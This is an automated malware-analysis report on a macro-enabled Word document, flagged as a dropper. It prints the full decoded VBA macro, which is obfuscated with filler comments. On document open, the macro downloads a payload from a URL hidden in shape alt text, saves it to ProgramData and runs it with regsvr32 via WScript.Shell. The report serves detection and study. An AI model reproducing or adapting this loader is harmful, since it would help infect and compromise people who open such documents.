Verdict: MALICIOUS
Risk score: 170
Heuristics: 6

- ClamAV: Doc.Dropper.Generic-9823819-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Generic-9823819-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project (VBA macros present)
- CreateObject call (high, OLE_VBA_CREATEOBJ): Matched line in script: `Set Owlmx = CreateObject("WinHttp.WinHttpRequest.5.1")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10739 bytes | 8fb79442f7768dd5d854f77471fff44c3b2e5c1f26304490069e6147d6aaf68c |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "XdcdK"
Sub uMJwx(ioeQR, Optional ByVal LCOFb As String = "c:\programdata\Aelbj.pdf")
' Navigators
' Lunched
' Sundried furious depoliticisation rebuffs cithers examined undignified
' Uninsulated mildly disowning
' Lasso anaesthetise
' Promulgated businessmen
' Jeeps hopelessness glorification
' Nomads glistening counterpointed
' Astrophysical megaparsec thins
' Dissolute decomposable commandeering
' Hitchhikers murk excavator
' Debut pixies westernised cleanly poses slumber
' Poult omelette leaver
' Henry hangup indistinctly letterbox theorem kicking arisen
' Convected interferometric yeast toggle
' Wildfires cutlasses undeserved fission
' Resonances obtaining barman flanker shoestrings
' Rescaling crofters sicken unmatched nihilistic
' Composes imploringly enlarging winkles
' Permeated helplines selfrighteous breathlessness
' Pinup scuppered tells
' Usable sufficiently remould dyes
' Excavations
' Zinc holocausts analogical beauties
' Cockatoos anvil mudflows
' Nabbed coals
' Frisks
' Primeness healing
' Indefinable perhaps cygnet
' Seethrough glasgow sublime scrappy dribbling photolysis
' Merchantman luanda
' Baring
' Transformed
' Lingeringly shortfalls
' Definer churlishness
' Businesses camels
' Stellar oneness squealed polio mull
' Sponge rates
' Endogenously spore scoundrels shampooing shippable
' Azaleas droops
cgCot = LCOFb
Open cgCot For Output As #1
' Scrape mullah dyslexia redeem
' Disharmonious fuzzed metastable indifferently freehand
' Anions headbands
' Chord cooperating flirts cunnilingus blacklisting artisans
' Loci geneticist dassie opener
' Hilltop postured viceroys sorriest aroma
Print #1, ioeQR
' Divide
' Maximising furtiveness okay headon
' Cantata catalysis powerfulness
' Snatcher
' Closeness sanitation
' Applicants chekov
Close #1
End Sub
' Pluralised
' Riffled dribble contestable whirling
' Payload foisting recuring energetically undemocratic
' Proponents bewilderingly soil
' Wimple stallholders radiograph
Sub AutoOpen()
' Popeyed barking hype
' Diversify infractions givers whistling
' Incompleteness string
' Aurevoir hyperactive hopper
' Beaming salacious thereof toucans
' Dawdling grizzly
' Persian pickerel
' Hoverer martingale undistinguished
' Bern disdain
' Seascape elevate
' Fondled permed bout
' Braves origination statutorily
' Coefficient investigates loiter distinctive handbasin
' Levitate savants blinker garrulous
' Beanstalks
' Pheasants
' Succeeded slant audibly
' Imparts dissensions surrealistic international
' Onyx levers
' Wipe intuition denigrate prosecuting callings
' Unambiguity stickily metalled
' Checkout troughs boos
' Virgins workable dissipate admirer dad
' Soggiest goodish exert
' Obtrude unmnemonic holdings
' Tetrahedrons eminently exclusivist
' Deterrence
' Garnish registry replicated speculative controllable syndicated
' Bungalows rill thrifts
Dim EOGSv As New psipl
' Deniers flapper altimeter fits hiatus
' Marginalised basest kinetics moribundly
' Tragically make endorsed slobbers reach
' Billiard fulminations grin chomped refuelling
' Deceitful throws lichee
ioeQR = EOGSv.TSeMZ()
' Modifying coolants
' Premiership conceded
' Mailings festers vanilla sequencer
' Reversals embattled masquerade dexterously
' Outsold extraditable liking pout landless prostrate affordability
uMJwx rlIHL(ioeQR)
' Savouring marmosets linesman steaming
' Cribbing mammalia reflexology
' Landmass
' Underwrote thor cocksure flint forfeited
' Complemented
' Torchbearer auditions hymen unclimbed sherbet
' Headmistresses hypnotherapy prefect
' Imputed imams
LIdPp MwgNT(0) + "r32 c:\programdata\Aelbj.pdf", ""
End Sub
Function brlrH(egfXx, LLqkR)
' Reconsulting imperially
' Tues parkas agleam catalytic emblazoned borough
' Squalor interchanged correlate conventional accounting widget
' Sown bell
' Breasting capybara undid shallowest
' Blonde detainer
brlrH = Split(egfXx, LLqkR)
End Function
Attribute VB_Name = "eBIWz"
' Fractured firing drachmas
' Pulmonary proprioceptive drat
' Sitar lowland boutique
' Oddly auditors
' Assignment joyfully
Function rlIHL(mjqWh)
' Grandpa crises
' Relativistic laissezfaire youths unguessable
' Preset improvidence garrotting oddment persecutors
' Grasshopper constructive startups coiling
' Necked frigidly udders
' Toddled
' Pauper topologically breakable serviceability
rlIHL = StrConv(mjqWh, vbUnicode)
' Lingerie deregulating
' Improbability
' Absorbing stablemate sabres
' Furriest censuring concubine littered
' Dampish snappy pop graph
End Function
' Breakpoints catnip fostered blank appeal
' Soothingly grenades purge monolayer suncream
' Democracies bricklayer
' Tripwire juno excitement
' Procedurally
Function FCJsc()
' Abuse nosily dakar scourging
' Shanties decoder hip bumble belike endotoxin gregariousness
' Aegina arriver intellectuals nicknamed scarifying makeweight
' Orderly octagons hairier
' Pushed dubbing plastic prescribed
' Quasar brochure clarifications cot amnesiac
' Transacted newsletter opportunely
' Purification refines
' Locking hauntingly essentialism stoves
' Checkering redrawn elites categorises
' Impalas maybe madden
' Institutionalise
FCJsc = ActiveDocument.shapes(1).AlternativeText
End Function
' Racehorses amphetamine decors renditions
' Cubing beset potpourri
' Distinguishes wintrier encampment
' Temperatures suggestion plutocrats propinquity
' Hood sacrum bulky
Function MwgNT(VuHsr)
' Passport jetty suboptimal decimation pledges
' Healthiest icebergs uncharacteristic accolade chromosomes premiums
' Schoolboys vasectomies cleverer grapefruit apses
' Importer recommenced mandibles reasonableness reassuming
' January
' Coagulate market
' Bonnie
' Daringly garlands
' Venerable scoreless wordy unhooks deaden
' Flowers
FROCO = FCJsc()
bcLbv = brlrH(FROCO, "kristi")
gpVNi = bcLbv(VuHsr)
MwgNT = gpVNi
End Function
Attribute VB_Name = "psipl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Daubing holdable requester
' Program
' Ingenuous echinoderm holmes metastases
' Forefingers misapplication functionalist hillock
' School saddens chapped
Function TSeMZ()
' Braindead escapee helicopters chewed
' Overbearing
' Evaporator obsessive
' Endpapers tricks intuitively thistles
' Humbleness required tropospheric
' Unheard fertiliser careful clanged purify voltage
' Merger undress flabbier representatives genitive barracking enterprises
Dim Owlmx As Object
' Stereotyped
' Adjustable niece hostess
' Treatable crunchy pacifists purser rounding
' Capstan watts worthies inquiringly
' Ravine monstrosities hypnotist
' Manoeuvred communities mourner permits
Set Owlmx = CreateObject("WinHttp.WinHttpRequest.5.1")
' Subcommittee grooved liberate
' Proactive swahili sodas subeditors unassociated frock
' Telephoning firstborns abounding statutes guttering
' Soapiest disgorging narcissism arcadia refers
' Aphids girding proportionally dismiss
' Editorial
' Deactivates disaffection gallivanted understated radiographer romany superposed
' Jostled jettison
' Trusts
' Fleecing
' Dues wined sing
' Absentminded
' Stature untrodden loudhailer
' Persistent loppers
' Laud purist algiers opprobrium
' Roundness snored gargles pipettes
' Unclouded
' Tuxedo peace endows
' Individualist amiably vapid nonchalance cuckold
' Incompetently weep abode
' Guffawed knighthoods
' Resoundingly excel anthropometric reelects meaninglessness
' Pressurised distillation
' Fender month revivalist
' Building paltriest marsupial udders
' Recoiled consequent brought
' Benighted benign
' Varsity incendiary
HcsyA = MwgNT(1)
' Editorial blackout notification
' Discharging intercepts disrobe retaining
' Indelible assign
' Generality pap unlawful
' Unwind impeding constrict
Owlmx.Open "GET", HcsyA, False
' Passions copes
' Attitude peaty olympiad
' Incident comprising
' Moo ridicules wafted veers
' Arks necks
Owlmx.Send
' Tether brooch
' Horrifically peculiarly necrophiliacs nest egress
' Baptised
' Depositions simpers goodfornothing
' Pointless undoubtedly retyped scree
' Snotty informational ferrets splinted leghorns enforce photographers
TSeMZ = Owlmx.responsebody
End Function
Attribute VB_Name = "JLNqx"
Sub LIdPp(HwGAX, PgmNn)
' Spiteful imply
' Collins placemen taboos rudders corroded
' Tutorials lysine dances forswear
' Asset forte july castigate soiree violating fraudulent
' Distance mincing solidness psychoanalytic
' Shareholding crushed
' Synapses creditably colossus lunar
' Storming upward
' Syncopation loitered tow tau
' Success thirsty hummocky rework irremovable
' Immense positivism leader
' Blasphemously underlain inveigh
' Compatriot boasts
' Misalignment denude
Set zofDr = CreateObject(PgmNn + MwgNT(2) + "ll").exec(HwGAX)
' Homework
' Cowboy relaunching pontification irksome
' Sightless paganism motiveless
' Grosser cinema bemusement partisan diaphanous
' Calory garnishing oranges perspectives anatomists drop
' Saxony whale
' Fluency four memorandum cut misogynists scarcely retailing
' Intermissions tenth dilutions unsafely burlesque tourism
' Sotho awaking stiffer
' Vitiates miners urticaria
' Hooped revel
' Encage rotatable
' Folk
' Arcing albany
' Planetesimals relatives bladders scantiest wielding chair
' Conic baal endurance
' Yokes ought devotes
' Bungles coalesced raise
' Straightforward funerals vibrate
' Breezily badged reviver
' Astronomers perceptively weighs welcomed arum
' Directives preplanned breakout describers diminished
' Frothiest environments haiti initialising
' Brochure motions
' Principality
' Tricking
' Hammocks waived recuperates book monoclonal mistake
' Alludes havenots whirlwind
' Rending nugget invertible
' Soybeans trinity proficiently
' Laundries seminar graticule roadsweepers deficit
' Malformation unvarying degenerate
' Elusive burglar unpacked
' Resentments ferrule
' Explosive hovering cuddle
' Quaking tattoo dilatation windowshop stratospheric
' Exporters dilutes
' Unicameral dahlias redundantly prejudicing
' Lofted housebound
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 41984 bytes | 459ee087a0064c2360d7e130fea8fe20ebbc4de28b37d9b2bad9534efec6cab3 |